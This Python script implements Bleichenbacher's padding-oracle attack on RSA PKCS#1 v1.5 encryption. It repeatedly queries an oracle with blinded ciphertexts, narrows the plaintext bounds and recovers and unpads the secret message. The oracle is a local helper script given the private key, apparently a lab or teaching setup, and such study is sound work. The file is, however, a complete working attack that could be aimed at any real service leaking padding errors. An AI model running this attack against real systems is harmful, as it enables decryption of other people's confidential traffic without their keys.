import random, math, sys, os
import functools

# pip3 install gmpy2
import gmpy2

# pip3 install hexdump
import hexdump

HEADER_BITS=16

pub_fname=sys.argv[1]
pri_fname=sys.argv[2] # not used here. only passed to oracle
good_c_fname=sys.argv[3]

from cryptography.hazmat.primitives.serialization import load_pem_public_key
f=open(pub_fname, "rb")
public_pem_data=f.read()
f.close()
key = load_pem_public_key(public_pem_data)
BITS=key.key_size
e=gmpy2.mpz(key.public_numbers().e)
n=gmpy2.mpz(key.public_numbers().n)

f=open(good_c_fname, "rb")
good_c=gmpy2.mpz(int.from_bytes(f.read(), byteorder="big", signed=False))
f.close()

def binlog(x):
    assert (x>0)
    return math.log(int(x), 2)

def short_hex(x):
    if x<10:
        return str(x)
    if binlog(x)<64:
        return hex(x)
    s=hex(x)
    return s[0:12]+"..."+s[-10:]+(" log2=%.1f" % binlog(x))

B=2**(BITS-HEADER_BITS)
_2B=gmpy2.mpz(2*B)
_3B_1=gmpy2.mpz(3*B)-1

m_min=_2B
m_max=_3B_1
s1_min=n//m_min
s1_max=n//m_max

calls_to_oracle=0

# first zero byte must be starting at idx=8+2, not earlier
def search_first_zero_byte(b):
    for i in range(len(b)):
        if b[i]==0:
            return i
    # no zero byte
    return -1

def delete_if_exists(fname):
    if os.path.exists(fname):
        os.unlink(fname)

def n_to_bytes(n, BITS):
    return int(n).to_bytes(length=BITS//8, byteorder="big", signed=False)

def oracle(c):
    assert isinstance(c, gmpy2.mpz)
    fname1="tmp1_"+str(os.getpid())
    delete_if_exists(fname1)
    f=open(fname1, "wb")
    f.write(n_to_bytes(c, BITS))
    f.close()
    rt=os.system ("./oracle_openssl.py "+fname1+" "+pri_fname)
    delete_if_exists(fname1)
    #print ("rt", rt)
    if rt!=0:
        return False
    if rt==0:
        return True

def intervals_intersection(i1_s, i1_e, i2_s, i2_e):
    # https://scicomp.stackexchange.com/questions/26258/the-easiest-way-to-find-intersection-of-two-intervals
    # check for non-intersecting intervals:
    if (i2_s > i1_e) or (i1_s > i2_e):
        # non-intersects
        return None
    return max(i1_s, i2_s), min(i1_e, i2_e)

def step_1():
    t=[]
    print ("step_1() begin")
    global calls_to_oracle
    s=n // _3B_1
    #s=2
    while True:
        print("step_1. trying s", short_hex(s),"  \r", end="")
        rt=oracle(good_c*pow(s, e, n) % n)
        calls_to_oracle=calls_to_oracle+1
        if rt:
            print ("rt=True")
            print ("s", short_hex(s))
            print ("overlaps in range (inclusive): ", s//s1_min, (s//s1_max))
            for overlaps in range(s//s1_min, (s//s1_max)+1):
                lower=(_2B+n*overlaps)//s
                upper=(_3B_1+n*overlaps)//s
                if lower>=_2B and upper<=_3B_1:
                    print ("m is between:", short_hex(lower), short_hex(upper))
                    print ("lower:")
                    hexdump.hexdump(n_to_bytes(lower, BITS))
                    print ("upper:")
                    hexdump.hexdump(n_to_bytes(upper, BITS))
                    print ("binlog(diff) %.1f" % binlog(upper-lower))
                    t.append((lower, upper, s))
            return t
        s=s+1
        if s-1 == n:
            assert False

def step_2(a, b, s_start):
    assert isinstance(a, gmpy2.mpz)
    assert isinstance(b, gmpy2.mpz)
    assert isinstance(s_start, gmpy2.mpz)
    print ("step_2")
    print ("a (lower)", short_hex(a))
    print ("b (upper)", short_hex(b))
    print ("s_start", short_hex(s_start))
    global calls_to_oracle
    r_start=2*((b*s_start - _2B) // n)
    print ("r_start", short_hex(r_start))
    for r in range(r_start, r_start+0x800): # tune this?
        print ("current r=", short_hex(r),"\r", end="")
        # pick s
        s_lower=(_2B + gmpy2.mpz(r)*n)//b
        s_upper=(_3B_1 + gmpy2.mpz(r)*n)//a
        for s in range(s_lower, s_upper+1):
            rt=oracle((good_c*pow(gmpy2.mpz(s), e, n)) % n)
            calls_to_oracle=calls_to_oracle+1
            if rt:
                print ("Oracle called with s", short_hex(s))
                print ("Valid padding.")
                # input interval - a,b
                # new interval:
                new_a=(_2B + gmpy2.mpz(r)*n)//gmpy2.mpz(s)   # lower
                new_b=(_3B_1 + gmpy2.mpz(r)*n)//gmpy2.mpz(s) # upper
                tmp=intervals_intersection(a, b, new_a, new_b)
                if tmp==None:
                    return None
                m_lower, m_upper=tmp
                print ("new m_lower/m_upper", short_hex(m_lower), short_hex(m_upper))
                print ("m_lower:")
                hexdump.hexdump(n_to_bytes(m_lower, BITS))
                print ("m_upper:")
                hexdump.hexdump(n_to_bytes(m_upper, BITS))
                assert m_upper >= m_lower
                if m_lower==m_upper:
                    # solution
                    return gmpy2.mpz(s), m_lower, m_upper
                print ("diff", short_hex(m_upper-m_lower))
                return gmpy2.mpz(s), m_lower, m_upper

    print ("Loop finished!")
    return None

def remove_padding(b):
    assert b[0:2]==b"\x00\x02"
    idx=search_first_zero_byte(b[2:])
    return b[2+1+idx:]

bounds=step_1()
while True:
    new_bounds=[]
    for bound in bounds:
        lower, upper, s=bound
        tmp = step_2(lower, upper, s)
        if tmp!=None:
            s, lower, upper = tmp
            if upper-lower<=1:
                print ("Found! upper:")
                upper_b=n_to_bytes(upper, BITS)
                hexdump.hexdump(upper_b)
                print ("With PKCS#1 1.5 padding removed:")
                hexdump.hexdump(remove_padding(upper_b))
                print ("calls_to_oracle", calls_to_oracle)
                exit(0)
            new_bounds.append((lower, upper, s))
        print ("calls_to_oracle", calls_to_oracle)
        print ("current len(bounds)", len(bounds))
    bounds=new_bounds

print ("Main loop finished without any result. Error.")

